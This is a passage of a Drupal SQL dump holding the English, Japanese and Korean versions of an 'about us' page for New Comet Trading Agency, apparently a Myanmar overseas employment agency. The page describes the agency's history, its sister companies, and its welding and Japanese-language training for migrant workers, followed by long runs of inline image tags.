data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_1.jpg\"><img data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_1.jpg\">', '', 'full_html'),
('page', 0, 23, 269, 'en', 0, '<p>We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</p><p>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</p><p>We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</p><p>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</p><p>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.</p><p>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</p><p>We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.</p><p>In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</p><p>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_0.jpg\" data-align=\"center\" data-entity-uuid=\"63ac130c-f5fd-4391-982d-9cbf22c9c88b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3.jpg\" data-align=\"center\" data-entity-uuid=\"e0e57835-6cc3-483a-895d-4d5108e80c57\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-4.jpg\" data-entity-uuid=\"9b3a507c-edd4-4ce3-b1a2-4936996fbe84\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5.jpg\" data-align=\"center\" data-entity-uuid=\"9eac5e99-94a6-4dab-a71a-c4c7a78b8a7b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6.jpg\" data-align=\"center\" data-entity-uuid=\"99025867-1165-45b9-987a-162bd77afc85\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7.jpg\" data-align=\"center\" data-entity-uuid=\"ab865942-61f8-4761-ac2c-b83b675886cf\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-8.jpg\" data-align=\"center\" data-entity-uuid=\"6eb2dc0f-9c32-4d4f-bb0a-7648ab39ab11\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9.jpg\" data-align=\"center\" data-entity-uuid=\"810afaf6-ff82-44e0-b231-927e848a41cc\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10.jpg\" data-align=\"center\" data-entity-uuid=\"3258c9ec-64da-4a37-9e22-cff0a7b23efc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11.jpg\" data-align=\"center\" data-entity-uuid=\"0f435fe2-d603-4e29-b1d6-f0cc0a29d626\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-12.jpg\" data-align=\"center\" data-entity-uuid=\"a095c373-2df3-4bba-be96-e259086824d6\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19.jpg\" data-align=\"center\" data-entity-uuid=\"28845640-721c-4663-99e4-3fe89a3fc124\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"f940eee5-3ae3-4b94-9585-f317c7d9bcb8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-30.jpg\" data-align=\"center\" data-entity-uuid=\"891213d9-115b-4b86-8d26-3ebbbbeb98a8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-31.jpg\" data-align=\"center\" data-entity-uuid=\"95019304-f6cb-4eaa-90da-ef0d7f51ee47\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-32.jpg\" data-align=\"center\" data-entity-uuid=\"361d538d-8be6-49d8-ae4e-5ac9247fd5b9\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-33.jpg\" data-align=\"center\" data-entity-uuid=\"e46b1924-0cc4-41fc-baa4-df9dd73fbec8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-34.jpg\" data-align=\"center\" data-entity-uuid=\"809ca92e-91d6-401f-b00b-567cc35ce1c5\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-35.jpg\" data-align=\"center\" data-entity-uuid=\"667d5781-8402-43e6-853f-ec90e796e6c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-36.jpg\" data-align=\"center\" data-entity-uuid=\"58b87ffa-6876-47b0-9e6e-d43d2c7aff38\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-37.jpg\" data-align=\"center\" data-entity-uuid=\"7b3b8c38-5bbf-4e74-85eb-618ca90b2db6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-38.jpg\" data-align=\"center\" data-entity-uuid=\"d0e647b4-4413-4a58-b4cb-91c95524d97f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-39.jpg\" data-align=\"center\" data-entity-uuid=\"ad197c72-ff23-4b15-b4ad-d15c791e6a77\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-40.jpg\" data-align=\"center\" data-entity-uuid=\"894ca453-d21f-4356-ad3e-bdb7c3e12408\" data-entity-type=\"file\" alt=\"\"><img data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-41.jpg\">', '', 'full_html'),
('page', 0, 23, 269, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"0a8cade2-9871-451c-a978-1d09fd84f0de\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_0.jpg\"><img data-entity-uuid=\"80dbdd8c-e8cd-465b-b26c-e04b67966c31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"d71b12e7-3d70-4a59-9715-2de3919ebc7d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"8a845720-846c-47c3-b9e9-e1f3098f65fc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_0.jpg\"><img data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"51eb9cfb-ea78-4874-a2fb-af8d0ff97c38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_0.jpg\" alt=\"\" data-align=\"center\"><p>&nbsp;</p><img data-entity-uuid=\"41991b55-c606-4270-9a2f-eb3871ba0f31\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_0.jpg\"><img data-entity-uuid=\"7f57bb37-0f0d-4aea-be9b-4a52fc0adf6f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"88251347-e029-437d-9ff8-51f406d4402c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_0.jpg\" alt=\"\"><img data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_0.jpg\"><img data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_0.jpg\" alt=\"\"><img data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"3aae8220-86a7-4232-91d1-58e14468ec77\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"031623ed-3c0b-4a1b-acd5-2d701d16ebac\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_0.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ef87488d-b6fc-43b9-a474-536a45ca31b3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_0.jpg\"><img data-align=\"center\" data-entity-uuid=\"b6b3f255-33bb-4aa9-bf27-91cff7be1296\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_0.jpg\"><img data-entity-uuid=\"19536b68-3af1-4ad0-9b3f-6a52f8d321d4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"99f5c203-f9a2-461a-8abc-2c8ba6a07f85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_0.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"a6cddcbb-87bf-46e9-b5f0-6eb2c81ee34a\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_0.jpg\" alt=\"\"><img data-entity-uuid=\"6e3b7635-3292-469e-a404-d217c165d0c8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"96bb0f24-5735-4d44-9780-209fc82eba38\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_0.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"b0020490-36a6-4ed1-bde8-eecc0d0e0bc0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_0.jpg\" data-align=\"center\"><img data-entity-uuid=\"7d4ada41-9768-43b4-83b9-469cc689b193\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_0.jpg\" data-align=\"center\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 23, 269, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.</p><p><br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.</p><p><br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.또한, 두바이, 말레이시아, 싱가포르, 태국, 일본 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 받알 수 있도록 &nbsp;서비스들을 제공하고 있습니다.</p><p><br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.</p><p><br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.</p><p><br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/1-NC_1.jpg\"><img data-entity-uuid=\"d19e5ddf-b119-4ed3-ac45-b0803d864c96\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-1_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f854e47f-d973-4dd9-8219-826768f1adc8\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-3_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"13857fa4-2c7a-4d5b-990d-45454d4ce664\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-4_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c4d3c7e6-c2a6-47c1-a423-afbb8fed637d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-5_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c2b2e5f4-fb99-4766-b2fd-9b2d6e680823\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-7_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a148620-3a3b-4fb9-8117-f6376f457d08\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"87fee7fa-f754-4ed1-8b4c-e407735f3467\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"9a88bbba-3b28-41fd-a8a8-84cca1770e30\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-15_1.jpg\"><img data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-16_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-17_1.jpg\" alt=\"\" data-align=\"center\"><img data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-18_1.jpg\" alt=\"\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_1.jpg\"><img data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-20_1.jpg\"><img data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f42194d2-173d-4d4b-ac0c-284914e1cb87\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-30_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"f127d213-3626-4b42-bc37-8092a71b102e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-31_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"71bc98fd-06ba-41c0-bcf6-b00ac31d60c2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-32_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"e2aa83c9-dcae-4217-b822-f3873b24be0e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-33_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"97341ea9-c3d9-4a97-b53e-fcd700908167\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-34_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"3d0fcd94-7f1e-4ab3-b585-7de2b6abb4a2\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-35_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0fcd4e94-95d7-4068-bb81-324b11b42f0b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-36_1.jpg\" data-align=\"center\"><img data-entity-uuid=\"0619bbdf-c510-43bc-9e9b-533659637d64\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-37_1.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"ff1153a3-aa9c-4673-bf92-21b3b0b9331d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-38_1.jpg\"><img data-entity-uuid=\"0170f578-5243-4700-a630-995e3e009f65\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-39_2.jpg\" data-align=\"center\"><img data-align=\"center\" data-entity-uuid=\"1d69982c-23e7-4c63-b748-667e38a06b7f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-40_1.jpg\">', '', 'full_html'),
